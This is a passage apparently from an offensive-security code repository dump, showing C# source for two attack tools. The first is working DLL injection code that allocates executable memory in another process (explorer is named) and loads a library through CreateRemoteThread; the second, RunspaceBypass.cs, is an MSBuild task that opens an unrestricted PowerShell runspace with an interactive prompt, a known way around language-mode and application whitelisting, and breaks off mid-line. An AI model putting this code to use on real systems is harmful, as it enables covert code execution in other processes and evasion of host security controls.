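            IntPtr hProcess = OpenProcess(ProcessAllAccess, false, pid);
            if (hProcess == IntPtr.Zero)
            {
                Console.WriteLine("OpenProcess failed: " + Marshal.GetLastWin32Error());
                return;
            }

            try
            {
                // LoadLibraryA expects a NUL-terminated ANSI string. The original
                // relied on the fresh allocation being zero-filled for the
                // terminator and on dllName.Length equalling its encoded byte
                // count, which Encoding.Default does not guarantee.
                byte[] path = Encoding.Default.GetBytes(dllName + "\0");
                uint size = (uint)Math.Max(0x1000, path.Length);
                IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, size, MemCommitReserve, PageExecuteReadWrite);
                if (addr == IntPtr.Zero)
                {
                    Console.WriteLine("VirtualAllocEx failed: " + Marshal.GetLastWin32Error());
                    return;
                }

                IntPtr written;
                if (!WriteProcessMemory(hProcess, addr, path, path.Length, out written) || written.ToInt64() != path.Length)
                {
                    Console.WriteLine("WriteProcessMemory failed: " + Marshal.GetLastWin32Error());
                    return;
                }

                // kernel32 is mapped at the same base in every process, so our
                // own LoadLibraryA address is valid inside explorer too.
                IntPtr loadLib = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
                if (loadLib == IntPtr.Zero)
                {
                    Console.WriteLine("LoadLibraryA not found");
                    return;
                }

                IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLib, addr, 0, IntPtr.Zero);
                if (hThread == IntPtr.Zero)
                {
                    Console.WriteLine("CreateRemoteThread failed: " + Marshal.GetLastWin32Error());
                    return;
                }
                // Nothing waits on the thread; just release the handle.
                CloseHandle(hThread);
            }
            finally
            {
                CloseHandle(hProcess);
            }
        }
    }
}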
48 |
--------------------------------------------------------------------------------
/csharp/RunspaceBypass.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using Microsoft.Build.Framework;
4 | using Microsoft.Build.Utilities;
5 | using System.IO;
6 | using System.Management.Automation;
7 | using System.Management.Automation.Runspaces;
8 | using System.Collections.ObjectModel;
9 | using System.Linq;
10 | using System.Reflection;
11 |
12 | public class ClassExample : Task, ITask
13 | {
14 | public override bool Execute()
15 | {
16 | string cmd = "$ExecutionContext.SessionState.LanguageMode";
17 |
18 | Runspace rs = RunspaceFactory.CreateRunspace();
19 | rs.Open();
20 |
21 | // instantiate a PowerShell object
22 | PowerShell ps = PowerShell.Create();
23 | ps.Runspace = rs;
24 |
25 | while (true)
26 | {
27 | Console.Write("PS> ");
28 | cmd = Console.ReadLine();
29 | if (String.IsNullOrWhiteSpace(cmd) || cmd == "exit" || cmd == "quit") break;
30 | ps.AddScript(cmd);
31 | ps.AddCommand("Out-String");
32 | PSDataCollection